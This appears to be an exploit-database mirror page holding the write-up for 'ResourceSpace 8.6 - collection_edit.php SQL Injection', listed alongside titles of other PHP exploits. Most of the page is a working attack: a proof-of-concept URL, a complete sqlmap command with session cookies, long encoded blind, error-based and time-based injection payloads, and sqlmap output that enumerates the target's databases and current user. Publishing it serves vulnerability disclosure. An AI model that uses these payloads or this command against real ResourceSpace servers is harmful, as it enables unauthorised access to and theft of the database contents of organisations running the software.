Menu

Improved exploit search engine. Try it out

"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection"

Author

dd_

Platform

php

Release date

2019-01-28

Release Date Title Type Platform Author
2019-05-24 "Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC" webapps php "Todor Donev"
2019-05-23 "Nagios XI 5.6.1 - SQL injection" webapps php JameelNabbo
2019-05-22 "Horde Webmail 5.2.22 - Multiple Vulnerabilities" webapps php InfinitumIT
2019-05-21 "WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities" webapps php "Simone Quatrini"
2019-05-21 "Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting" webapps php "Dionach Ltd"
2019-05-23 "Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-20 "eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution" webapps php liquidsky
2019-05-20 "GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-17 "Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution" webapps php "numan türle"
2019-05-16 "DeepSound 1.0.4 - SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-15 "Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php LiquidWorm
2019-05-15 "CommSy 8.6.5 - SQL injection" webapps php "Jens Regel_ Schneider_ Wulf"
2019-05-14 "PasteShr 1.6 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-14 "Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection" webapps php "Julien Ahrens"
2019-05-14 "Sales ERP 8.1 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-14 "PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)" remote php AkkuS
2019-05-13 "OpenProject 5.0.0 - 8.3.1 - SQL Injection" webapps php "SEC Consult"
2019-05-13 "XOOPS 2.5.9 - SQL Injection" webapps php "felipe andrian"
2019-05-13 "SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - SQL Injection" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Information Disclosure" webapps php LiquidWorm
2019-05-09 "Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting" webapps php "Ibrahim Raafat"
2019-05-06 "PHPads 2.0 - 'click.php3?bannerID' SQL Injection" webapps php "felipe andrian"
2019-05-03 "Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution" webapps php hash3liZer
2019-05-03 "Instagram Auto Follow - Authentication Bypass" webapps php Veyselxan
2019-04-30 "Agent Tesla Botnet - Information Disclosure" webapps php n4pst3r
2019-04-30 "Hyvikk Fleet Manager - Shell Upload" webapps php saxgy1331
2019-04-30 "Joomla! Component JiFile 2.3.1 - Arbitrary File Download" webapps php "Mr Winst0n"
2019-04-30 "HumHub 1.3.12 - Cross-Site Scripting" webapps php "Kağan EĞLENCE"
2019-04-30 "Joomla! Component ARI Quiz 3.7.4 - SQL Injection" webapps php "Mr Winst0n"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46274/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46274/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46274/40749/resourcespace-86-collection_editphp-sql-injection/download/", "exploit_id": "46274", "exploit_description": "\"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection\"", "exploit_date": "2019-01-28", "exploit_author": "dd_", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
# Exploit Title: ResourceSpace <=8.6 'collection_edit.php' SQL Injection
# Dork: N/A
# Date: 2019-01-25
# Exploit Author: dd_ (info@malicious.group)
# Vendor Homepage: https://www.resourcespace.com/
# Software Link: https://www.resourcespace.com/get
# Version: Stable release: 8.6
# Tested on: PHP/MySQL (PHP 7.2 / MySQL 5.7.25-0ubuntu0.18.04.2-log)
# Vendor Alerted: 1/21/2019
# Vendor Banner: ResourceSpace open source digital asset management software is the simple, fast, & free way to organise your digital assets.


# POC:
# 1)
# http://localhost/pages/collection_edit.php?CSRFToken=[CRSF_TOKEN_HERE]&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=[SQL]&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0




# Running the SQLMap command:

sqlmap -u 'http://localhost/pages/collection_edit.php' --data='CSRFToken=<csrf token>&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=*&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0' --cookie='language=en-US;language=en-US;thumbs=show;user=3154df279ea69a45caeaccf8a5fd1550;saved_col_order_by=created;saved_col_sort=ASC;per_page_list=15;saved_themes_order_by=name;saved_themes_sort=ASC;display=thumbs;per_page=48;saved_sort=DESC;geobound=-5244191.6358594%2C-786628.3871876%2C4;plupload_ui_view=list;ui_view_full_site=true' --dbms=mysql --level=5 --risk=3 -p keywords --technique=ETB --dbs --current-user --current-db --is-dba




# Will trigger the following injection methods:


[*] starting @ 13:21:45 /2019-01-25/

[13:21:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keywords (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: CSRFToken=YzcxMmYxMTcyM2E1NjYyNWFmZTAxZTBlMTZmYjI2OTU2YzI0OWNhZTBjMzNmYzI0ZTRiYWVhYWU4N2RlNTNhNUBAuVxTyzjb6fJYqUBQWsiawgfoEuxQKvG6HI4LkQLUD3zkfW1Ni0V3REGj2AfURF5FBV5DHL75lM567skQLf1dibiUn04ySzgpx6O4j3z1QkGJpnCM27K6wH5lt8Inzhg31+PLoS26LP6ONDFrwQmf07Se8Z2fDtGi5xoJDBM9oHZxqNmrrryGVQpsmcpIYSr/+IsJ/4gExUQdyH4MMfkUuEmkQssMPSJFS6nNQEC9jwrfoxy3p9fApNyEeu+Wofo4UNOtE3sUIux/h3WUjg==&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN' RLIKE (SELECT (CASE WHEN (6076=6076) THEN 0x3125323532372532353246253235324125323532412532353246524c494b452532353246253235324125323532412532353246253235323853454c454354253235324625323532412532353241253235324625323532384341534525323532462532353241253235324125323532465748454e253235324625323532412532353241253235324625323532384f524425323532384d49442532353238253235323853454c454354253235324625323532412532353241253235324649464e554c4c2532353238434153542532353238434f554e54253235323844495354494e43542532353238736368656d615f6e616d65253235323925323532392532353246253235324125323532412532353246415325323532462532353241253235324125323532464348415225323532392532353243307832302532353239253235324625323532412532353241253235324646524f4d2532353246253235324125323532412532353246494e464f524d4154494f4e5f534348454d412e534348454d41544125323532392532353243312532353243312532353239253235323925323533453536253235323925323532462532353241253235324125323532465448454e2532353246253235324125323532412532353246312532353246253235324125323532412532353246454c53452532353246253235324125323532412532353246307832382532353246253235324125323532412532353246454e44253235323925323532392532353246253235324125323532412532353246414e4425323532462532353241253235324125323532462532353237534a584e253235323725323533442532353237534a584e ELSE 0x28 END)) AND 'HDWY'='HDWY&public=0&autocomplete_parameter=pwned&users=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: CSRFToken=YzcxMmYxMTcyM2E1NjYyNWFmZTAxZTBlMTZmYjI2OTU2YzI0OWNhZTBjMzNmYzI0ZTRiYWVhYWU4N2RlNTNhNUBAuVxTyzjb6fJYqUBQWsiawgfoEuxQKvG6HI4LkQLUD3zkfW1Ni0V3REGj2AfURF5FBV5DHL75lM567skQLf1dibiUn04ySzgpx6O4j3z1QkGJpnCM27K6wH5lt8Inzhg31+PLoS26LP6ONDFrwQmf07Se8Z2fDtGi5xoJDBM9oHZxqNmrrryGVQpsmcpIYSr/+IsJ/4gExUQdyH4MMfkUuEmkQssMPSJFS6nNQEC9jwrfoxy3p9fApNyEeu+Wofo4UNOtE3sUIux/h3WUjg==&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN' AND EXTRACTVALUE(8779,CONCAT(0x5c,0x716b786a71,(SELECT (ELT(8779=8779,1))),0x7176626271)) AND 'cjUk'='cjUk&public=0&autocomplete_parameter=pwned&users=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind
    Payload: CSRFToken=YzcxMmYxMTcyM2E1NjYyNWFmZTAxZTBlMTZmYjI2OTU2YzI0OWNhZTBjMzNmYzI0ZTRiYWVhYWU4N2RlNTNhNUBAuVxTyzjb6fJYqUBQWsiawgfoEuxQKvG6HI4LkQLUD3zkfW1Ni0V3REGj2AfURF5FBV5DHL75lM567skQLf1dibiUn04ySzgpx6O4j3z1QkGJpnCM27K6wH5lt8Inzhg31+PLoS26LP6ONDFrwQmf07Se8Z2fDtGi5xoJDBM9oHZxqNmrrryGVQpsmcpIYSr/+IsJ/4gExUQdyH4MMfkUuEmkQssMPSJFS6nNQEC9jwrfoxy3p9fApNyEeu+Wofo4UNOtE3sUIux/h3WUjg==&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN' RLIKE SLEEP(5) AND 'EqqU'='EqqU&public=0&autocomplete_parameter=pwned&users=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0
---
[13:21:47] [INFO] testing MySQL
[13:21:47] [INFO] confirming MySQL
[13:21:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.14.0
back-end DBMS: MySQL >= 5.0.0
[13:21:48] [INFO] fetching current user
[13:21:50] [INFO] retrieved: 'pwner@localhost'
current user:    'pwner@localhost'
[13:21:50] [INFO] fetching current database
[13:21:52] [INFO] retrieved: 'resourcespace'
current database:    'resourcespace'
[13:21:52] [INFO] testing if current user is DBA
[13:21:52] [INFO] fetching current user
current user is DBA:    False
[13:21:53] [INFO] fetching database names
[13:21:54] [WARNING] the SQL query provided does not return any output
[13:21:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:21:54] [INFO] fetching number of databases
[13:21:54] [INFO] resumed: 6
[13:21:54] [INFO] resumed: information_schema
[13:21:54] [INFO] resumed: mysql
[13:21:54] [INFO] resumed: performance_schema
[13:21:54] [INFO] resumed: phpmyadmin
[13:21:54] [INFO] resumed: resourcespace
[13:21:54] [INFO] resumed: sys
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] resourcespace
[*] sys

[13:21:54] [INFO] fetched data logged to text files under '/home/notroot/.sqlmap/output/localhost'

[*] ending @ 13:21:54 /2019-01-25/